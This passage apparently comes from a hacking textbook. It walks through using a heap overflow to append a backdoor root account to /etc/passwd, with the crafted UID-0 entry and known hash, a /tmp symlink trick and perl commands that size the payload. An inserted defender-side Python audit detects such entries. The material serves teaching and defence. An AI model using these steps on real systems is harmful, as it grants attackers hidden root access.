for that user. Using the salt value from the stored encrypted password, the
system uses the same one-way hashing algorithm to encrypt whatever text
the user typed as the password. Finally, the system compares the two hashes;
if they are the same, the user must have entered the correct password. This
allows the password to be used for authentication without requiring that the
password be stored anywhere on the system.
Using one of these hashes in the password field will make the password
for the account be password , regardless of the salt value used. The line to
append to /etc/passwd should look something like this:
myroot:XXq2wKiyI43A2:0:0:me:/root:/bin/bash
However, the nature of this particular heap overflow exploit won't allow
that exact line to be written to /etc/passwd, because the string must end with
/etc/passwd. But if that filename is merely appended to the end of
the entry, the passwd file entry would be invalid. This can be compensated
for with the clever use of a symbolic file link, so the entry can both end with
/etc/passwd and still be a valid line in the password file. Here's how it works:
reader@hacking:~/booksrc $ mkdir /tmp/etc
reader@hacking:~/booksrc $ ln -s /bin/bash /tmp/etc/passwd
reader@hacking:~/booksrc $ ls -l /tmp/etc/passwd
lrwxrwxrwx 1 reader reader 9 2007-09-09 16:25 /tmp/etc/passwd -> /bin/bash
reader@hacking:~/booksrc $
Now /tmp/etc/passwd points to the login shell /bin/bash. This means
that a valid login shell for the password file is also /tmp/etc/passwd, making
the following a valid password file line:
myroot:XXq2wKiyI43A2:0:0:me:/root:/tmp/etc/passwd
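As an added, defender-side example (not code from the book): a small Python audit that parses passwd-format lines and flags the traces an entry like the one above leaves behind: a second UID-0 account, a hash stored inline instead of in /etc/shadow, and a login shell that lives under a world-writable directory or is a symlink to a differently named binary. The sample entries and the shell allowlist are constructed for the example; a real audit would read /etc/passwd and /etc/shells.

```python
import os

# Constructed sample, not a real system file. The last entry models the line
# built above: a second UID-0 account, an inline hash, and a symlinked shell.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
reader:x:1000:1000:reader,,,:/home/reader:/bin/bash
myroot:XXq2wKiyI43A2:0:0:me:/root:/tmp/etc/passwd
"""

# Assumed baseline of acceptable shells; a real audit would read /etc/shells.
KNOWN_SHELLS = frozenset({"/bin/bash", "/bin/sh", "/usr/sbin/nologin", "/bin/false"})
WORLD_WRITABLE = ("/tmp/", "/var/tmp/", "/dev/shm/")


def audit_passwd(text, known_shells=KNOWN_SHELLS, realpath=os.path.realpath):
    """Return (line_number, account, reason) findings for suspicious entries.
    realpath is injectable so the symlink check can run without a real filesystem."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip():
            continue
        fields = line.split(":")
        if len(fields) != 7:
            findings.append((lineno, line[:16], "malformed entry (expected 7 fields)"))
            continue
        name, passwd, uid, _gid, _gecos, _home, shell = fields
        if uid == "0" and name != "root":
            findings.append((lineno, name, "extra UID-0 account"))
        if passwd == "":
            findings.append((lineno, name, "empty password field"))
        elif passwd not in ("x", "*", "!"):
            # With shadow passwords the hash belongs in /etc/shadow, not here.
            findings.append((lineno, name, "password hash stored inline in passwd"))
        if shell not in known_shells:
            findings.append((lineno, name, f"unexpected login shell {shell}"))
        if shell.startswith(WORLD_WRITABLE):
            findings.append((lineno, name, "login shell under a world-writable directory"))
        target = realpath(shell)
        # Compare basenames so a merged-/usr alias (/bin/bash -> /usr/bin/bash)
        # is not flagged, but a shell that resolves to a differently named
        # binary (/tmp/etc/passwd -> /bin/bash) is.
        if os.path.basename(target) != os.path.basename(shell):
            findings.append((lineno, name, f"login shell is a symlink to {target}"))
    return findings
```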
The values of this line just need to be slightly modified so that the portion
before /etc/passwd is exactly 104 bytes long:
reader@hacking:~/booksrc $ perl -e 'print "myroot:XXq2wKiyI43A2:0:0:me:/root:/tmp"' | wc -c
38
reader@hacking:~/booksrc $ perl -e 'print "myroot:XXq2wKiyI43A2:0:0:" . "A"x50 . ":/root:/tmp"' | wc -c
86
reader@hacking:~/booksrc $ gdb -q
(gdb) p 104 - 86 + 50
$1 = 68
(gdb) quit
reader@hacking:~/booksrc $ perl -e 'print "myroot:XXq2wKiyI43A2:0:0:" . "A"x68 . ":/root:/tmp"' | wc -c
104
reader@hacking:~/booksrc $
If /etc/passwd is added to the end of that final string (shown in bold), the
string above will be appended to the end of the /etc/passwd file. And since
this line defines an account with root privileges with a password we set, it won't